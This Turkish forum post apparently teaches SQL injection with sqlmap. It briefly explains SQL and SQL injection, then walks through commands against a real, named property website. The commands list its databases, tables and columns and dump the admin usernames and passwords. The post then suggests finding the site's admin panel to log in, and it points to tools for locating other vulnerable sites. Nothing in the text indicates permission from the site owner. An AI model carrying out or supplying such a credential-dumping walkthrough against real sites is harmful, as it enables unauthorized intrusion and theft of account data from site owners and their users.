Hoşgeldin Misafir

SQLMap Komutları Kullanımı

LikeForYou

26 Eyl 2017
728 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Sql, verileri yönetmek ve tasarlamak için kullanılan bir veritabanı yönetim sistemidir. SQL, kendisi bir programlama dili olmamasına rağmen çoğu kişi tarafından programlama dili olarak tanımlanır. SQL herhangi bir veri tabanı ortamında kullanılan bir alt dildir. SQL ile sadece veri tabanı üzerinde prosedür yapılabilir. SQL'e özgü cümleler kullanarak veri tabanına kayıt eklenebilir, olan kayıtlar değiştirilebilir, silinebilir ve bu kayıtlardan listeler oluşturulabilir.

SQL Injection. internet programlarında ki en ciddi açıkların başında gelir. Özellikle frameworkler ve ORM (Object Relational Mapping) gibi ekstra veritabanı katmanlarının popülerleşmesi ile eskisine göre bugünlerde biraz daha az görülmektedir ancak emin olun hala heryerdeler!
Web uygulaması geliştiricilercileri SQL Injection ı tam anlamadıklarından kaynaklı bazı ölümcül hatalar yaparlar. Bu yüzden bugün bilinen kolay SQL Injection metodları o kadar çok görünmese de ileri de anlatacağımız ileri seviye SQL Injection açıklarını çok büyük firmalardan, hazır sistemlere kadar birçok yerde görebilirsiniz.

Sqlmap, Sql tabanlı sitelerin güvenliğini denetlemek için kullanılan son derece kolay bir araçtır. Normalde Linux üzerinden çalışır ama Windows için olanı da mevcuttur; Windows için olanı çizgisel arabirime sahiptir, Linux için olanı ise komut satırı kullanıcı arayüzüne sahiptir..

Bir kaç (Ç)alıntı ile sql,sql injection ve sqmlmap kavramlarını tanıdık.
Başlayalım..

Kali Linux kullanmakta iseniz esasen bilgisayarınızda kuruludur. Ama kali Linux kullanmıyorsanız aşağıdaki komut ile sisteminize indirebilirsiniz.
git clone git://git.kali.org/packages/sqlmap.git

bu komutu yazdıktan sonra terminale git bulanamadı tarzı hata alırsanız aşağıdaki komutu yazınız.
sudo apt-get install git

Ardında Sqlmap uygulamasının bulunduğu dizine geçelim.
cd sqlmap

Devam edelim.İlk olarak kendimize bir hedef site saptamamiz gerekiyor. (nerden bulcam ben sql açıklı siteyi? derseniz Sql Açıklı site bulma uygulamasını buradanindirebilirsiniz.Dilerseniz, bir hedef site belirleyebilir, bu sitedeki açıkları buradaki program ile bulabilirsiniz.)

Belirlediğim site; " http://ceburealproperty.com/ "
Sql Error: " http://ceburealproperty.com/show_cat_page.php?id=3' "

ޞimdi terminale şu komutu yazalım;
python ./sqlmap.py -u "http://ceburealproperty.com/show_cat_page.php?id=3'" --dbs


Bazen bize E/H (Evet-Hayır) sorularını sorabilir. "E" diyerek devam ediyoruz. Kırmızı çıktılar haricinde..
Resimde görüldüğü gibi dataBaseleri bulduk..

"information_schema" değildir hiçbir zaman bunu bilin. Şimdi aşağıdaki komut ile devam edelim.
python ./sqlmap.py -u "http://ceburealproperty.com/show_cat_page.php?id=3'" -D cebureal_db --tables

-D parametresinin yanısıra DataBase ismini yazıyoruz. Bu sitede ki dataBase cebureal_db olduğu için cebureal_db yazdık. şayet dataBase adı hacker_Adana olsaydı parametremiz -D hacker_Adana olurdu. --tables parametresi ile tabloları arıyoruz...

evet cebureal_db dataBasesinin tablolarını bulduk. Şimdi burada şu önemli; buradaki tabloların içinde admin, user adında yada bu isimlerde tablo olmazsa bunlara yakın ismi olan tabloları seçmeliyiz. Burada direk admin olduğu için admin'i seçiyoruz. Ve aşağıdaki komutu yazıyoruz.
python ./sqlmap.py -u "http://ceburealproperty.com/show_cat_page.php?id=3'" -D cebureal_db -T admin --columns

Aynı mantık burada da geçerli. Seçtiğimiz kolonu -T parametresinin yanına yazıyoruz..
Komutu yazıp taramanın bitmesini bekleyelim..

Evet uzun bir tarama sonucunda kolonları bulduk..
Şimdi seçtiğimiz kolonların adlarını -C parametresi yanına virgülle yazıyoruz..
python ./sqlmap.py -u "http://ceburealproperty.com/show_cat_page.php?id=3'" -D cebureal_db -T admin -C username,passWord --dump

Şimdi enter ile devam edelim. --dump komutu dataları arayacak ve bize şifreleri ve kullanıcı isimlerini çıkartacak..


Yukarıda görüldüğü gibi Kullanıcı adı ve şifresi çıktı. Bu kadar.. ))
Şimdi admin bilgilerine ulaştığımıza göre Site'nin admin panelini bulup girmek kaldı..
Admin Panel Finder Adlı programı kullanabilmeniz mümkün...
Tabi bu kolonlarda her zaman user ve passWord olacak diye bişey yok.. E-Mail gibi farklı bilgilerde çıkabilir.